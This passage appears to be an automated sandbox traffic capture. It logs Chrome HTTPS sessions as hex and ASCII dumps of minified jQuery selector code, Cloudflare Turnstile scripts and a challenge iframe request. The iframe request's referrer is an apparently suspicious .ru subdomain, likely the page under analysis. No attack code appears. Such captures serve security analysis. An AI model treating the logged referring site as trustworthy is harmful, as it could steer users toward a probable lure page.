                                                                2025-01-07 21:36:03 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.1649730104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:03 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:03 UTC471INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:03 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 47521
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714c648f2425d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:03 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.1649731104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:03 UTC798OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/ HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: iframe
                                                                Referer: https://sung.ethamoskag.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:03 UTC1362INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 26636
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                cross-origin-embedder-policy: require-corp
                                                                cross-origin-opener-policy: same-origin
                                                                cross-origin-resource-policy: cross-origin
                                                                origin-agent-cluster: ?1
                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                referrer-policy: same-origin
                                                                document-policy: js-profiling
                                                                2025-01-07 21:36:03 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 37 31 34 63 36 39 64 37 34 38 63 32 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                Data Ascii: Server: cloudflareCF-RAY: 8fe714c69d748c29-EWRalt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:03 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
